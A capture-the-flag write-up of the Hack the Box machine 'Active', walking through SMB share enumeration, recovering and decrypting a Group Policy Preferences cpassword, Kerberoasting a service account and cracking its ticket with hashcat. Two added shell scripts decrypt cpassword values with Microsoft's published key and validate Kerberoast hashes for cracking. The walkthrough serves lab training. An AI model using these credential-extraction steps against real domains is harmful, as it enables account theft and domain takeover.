Write-Up: HTB Active

For my second blog I tackled the Active box on Hack the Box.

Started off running the standard nmap scan. Opening the output file, there is a lot to look at. Most boxes I have come across so far have been web servers, but judging by the open ports this one clearly is not: it looks like a Windows Server 2008 host running SMB, Kerberos, and LDAP, a combination that strongly suggests a domain controller.

First thing to try is an anonymous (null-session) share listing with smbmap. I tend to waffle between this tool and smbclient, but went with smbmap this time. Looking at the results, I have access to the “Replication” share.

Use -R with smbmap to recursively list the Replication share. Lots of output, and for some reason it didn’t follow every folder path all the way down… Strange.

Tried again on the various sub-folders (cut out the non-interesting ones to save space) and found a Groups directory with a Groups.xml file under the Policies folder. Based on some previous research (thanks, Sean Metcalf, for all your AD work), we know that these Group Policy Preferences files can contain a password: when a GPO is used to create or update a local account and set its password, that value is written into the file’s cpassword attribute.

Download the file… Drum-roll please.

And there it is! I’ve got a username and what looks like a password hash.

Not 100% sure what kind of value this is, so it’s time to google. Searched “Microsoft group policy password hash” and found that it is a GPP cpassword (thanks, Sean, again). Despite how it looks, it isn’t a hash at all: it is the password AES-256-CBC encrypted under a static key that Microsoft itself published in its documentation, so there is nothing to crack, only decrypt. The first tool that comes up is gpp-decrypt, and it’s already on Kali. Throw the value in and there we go, we have a password! (MS14-025 stopped GPP from setting new passwords this way, but it did nothing about Groups.xml files already sitting in SYSVOL, which is why this still turns up.) Now time to keep poking.
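Here is what gpp-decrypt is doing under the hood, as an added shell example written for this write-up rather than code from the post or from the Kali tool. It assumes openssl, base64 and iconv are on the path; the key is the one Microsoft published, and the Groups.xml, account name, domain and password used below are constructed for the demo and are not the ones from the box.

```shell
#!/usr/bin/env bash
# Added example: a minimal equivalent of what gpp-decrypt does. Not the Kali
# tool and not code from the original post.
# Group Policy Preferences store cpassword as AES-256-CBC ciphertext of the
# UTF-16LE password, null IV, under a fixed key that Microsoft published in its
# own documentation, so "cracking" is just decryption.
set -eu

GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000

# gpp_decrypt <cpassword>: print the plaintext password.
gpp_decrypt() {
  b64=$1
  # Groups.xml stores base64 with the '=' padding stripped; restore it first.
  while [ $(( ${#b64} % 4 )) -ne 0 ]; do b64="${b64}="; done
  printf '%s' "$b64" | base64 -d \
    | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
    | iconv -f UTF-16LE -t UTF-8
}

# gpp_encrypt <password>: produce a cpassword the way GPP did. Only used here
# to build a test vector so the example runs without a real Groups.xml.
gpp_encrypt() {
  printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
    | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
    | base64 | tr -d '=\n'
}

# gpp_extract <Groups.xml>: print "userName plaintext" for every <Properties>
# element that carries a cpassword attribute.
gpp_extract() {
  grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' "$1" \
  | while read -r props; do
      user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
      cpw=$(printf '%s' "$props" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
      printf '%s %s\n' "$user" "$(gpp_decrypt "$cpw")"
    done
}

# Constructed sample file (not the one from the box): the account name, domain
# and password are made up; the clsid values are the standard GPP Groups/User ones.
SAMPLE_GROUPS_XML=$(mktemp)
trap 'rm -f "$SAMPLE_GROUPS_XML"' EXIT
cat > "$SAMPLE_GROUPS_XML" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup">
    <Properties action="U" cpassword="$(gpp_encrypt 'Passw0rd!')" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="corp.local\svc_backup"/>
  </User>
</Groups>
EOF

gpp_extract "$SAMPLE_GROUPS_XML"   # prints: corp.local\svc_backup Passw0rd!
```

Point the `gpp_extract` function at any Groups.xml pulled from a share and it prints the account and its cleartext password; the padding loop matters because the stored base64 has its trailing `=` removed and `base64 -d` rejects it otherwise.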

Try smbmap with the new user and password combo.

The Users share immediately sticks out. Dug in, and the recursive smbmap listing produces a wall of output, but reading through it there’s a gem at the bottom.

Grab that flag and submit it.

Next, I tried CrackMapExec to see if I could pop a shell, but nothing. No write permissions, unfortunately: psexec-style execution needs a writable ADMIN$ share, and this account doesn’t have that.

Looking back at the scan we know the box has LDAP and Kerberos running. Let’s enumerate with Impacket and see what I can find (another shout-out needed here to Tim Medin for his Kerberoasting webinars).

Found some users and tried the password against them with CrackMapExec, but no dice. Time to try another module to see if we can grab a hash: Impacket’s Kerberoasting tool, GetUserSPNs.py, asks the KDC for a service ticket for every account that has an SPN registered, which any authenticated domain user is allowed to do. And there it is! (Note: the command output copied poorly into the code box below, so I did some formatting.)

The format identifies the hash as Kerberos 5 TGS-REP etype 23, hashcat mode 13100. Etype 23 is RC4-HMAC, and the ticket is encrypted with a key derived directly from the service account’s NT hash, which is what makes an offline wordlist attack possible. Throw the hash into hashcat and…
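Before feeding a copied ticket to hashcat it is worth checking that the string is still intact, especially after the kind of line-wrapping the note above describes. The shell functions below are an added example for this write-up, not code from the post or from Impacket/hashcat: they rejoin a wrapped hash and validate the `$krb5tgs$23$*user$REALM$spn*$checksum$ticket` layout that GetUserSPNs.py emits and hashcat -m 13100 expects. The sample hash, account, realm and SPN are constructed, and the checksum and ticket bytes are placeholder hex.

```shell
#!/usr/bin/env bash
# Added example: sanity-check a Kerberoast hash before handing it to hashcat.
# Layout of a hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) line:
#   $krb5tgs$23$*<user>$<REALM>$<spn>*$<16-byte HMAC-MD5 checksum, hex>$<encrypted ticket, hex>
set -eu

# Constructed sample, not a ticket from the box: the checksum and ticket bytes
# are placeholder hex, and a real ticket blob runs to thousands of hex characters.
SAMPLE_HASH='$krb5tgs$23$*svc_web$CORP.LOCAL$http/web.corp.local*$8f2c1a0d7e6b5c4a3f2e1d0c9b8a7f6e$a1b2c3d4e5f60718293a4b5c6d7e8f90fedcba9876543210abcdef0123456789'

# The same hash as it tends to land in a blog code box: wrapped and indented.
WRAPPED_HASH='$krb5tgs$23$*svc_web$CORP.LOCAL$http/web.corp.local*$8f2c1a0d7e6b5c4a3f2e1d0c9b8a7f6e$a1b2c3d4e5f60718293a4b5c6d7e8f90
    fedcba9876543210abcdef0123456789'

# krb5tgs_normalize: stdin -> stdout. Rejoins a hash that was line-wrapped or
# space-padded when copied into notes.
krb5tgs_normalize() {
  tr -d ' \t\r\n'
}

# is_hex <string> [length]: succeed if the string is hex digits, optionally of
# exactly the given length.
is_hex() {
  if [ $# -ge 2 ]; then pat="^[0-9a-fA-F]{$2}\$"; else pat='^[0-9a-fA-F]+$'; fi
  printf '%s' "$1" | grep -Eq "$pat"
}

# krb5tgs_parse <hash>: validate the structure and print "user realm spn".
# Returns 1 with a reason on stderr if hashcat -m 13100 would not accept the line.
krb5tgs_parse() {
  h=$1
  case "$h" in
    '$krb5tgs$23$*'*) ;;
    '$krb5tgs$'*)
      echo "etype is not 23: AES tickets (etype 17/18) need hashcat -m 19600/19700, not 13100" >&2
      return 1 ;;
    *) echo "not a \$krb5tgs\$ hash" >&2; return 1 ;;
  esac
  rest=${h#\$krb5tgs\$23\$\*}
  ident=${rest%%\*\$*}        # user$REALM$spn
  data=${rest#*\*\$}          # checksum$ticket
  [ "$ident" != "$rest" ] || { echo "missing '*\$' separator after the SPN" >&2; return 1; }
  user=${ident%%\$*}
  realm_spn=${ident#*\$}
  realm=${realm_spn%%\$*}
  spn=${realm_spn#*\$}
  checksum=${data%%\$*}
  edata=${data#*\$}
  [ -n "$user" ] && [ -n "$realm" ] && [ -n "$spn" ] \
    || { echo "empty user/realm/spn field" >&2; return 1; }
  is_hex "$checksum" 32 \
    || { echo "checksum must be 32 hex chars (16-byte HMAC-MD5)" >&2; return 1; }
  [ -n "$edata" ] && [ $(( ${#edata} % 2 )) -eq 0 ] && is_hex "$edata" \
    || { echo "ticket data must be a non-empty, even-length hex string" >&2; return 1; }
  printf '%s %s %s\n' "$user" "$realm" "$spn"
}

# Typical flow: rejoin the pasted hash, confirm it parses, then crack it with
#   hashcat -m 13100 -a 0 kerberoast.txt wordlist.txt
clean=$(printf '%s' "$WRAPPED_HASH" | krb5tgs_normalize)
krb5tgs_parse "$clean"   # prints: svc_web CORP.LOCAL http/web.corp.local
```

The etype check is the one that bites in practice: a ticket for an account whose encryption type is AES comes out as `$krb5tgs$17$` or `$krb5tgs$18$` and needs a different hashcat mode, and a 32-character checksum that has lost or gained a character from a bad copy will be rejected by hashcat with an unhelpful separator error.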

We get a hit!

I checked smbmap on my first attempt, but I could also have run CrackMapExec to check whether the cracked credentials give admin on the box (CrackMapExec flags that) and then run psexec.py. Ultimately, both paths get the flag, just one with an actual shell :)

Run another recursive smbmap command on the Users share with the admin creds.

And grab the flag — box owned!

If you made it this far, thank you for reading! I am attempting to put out one blog a week as I go through old boxes so check back for more HTB write-ups.
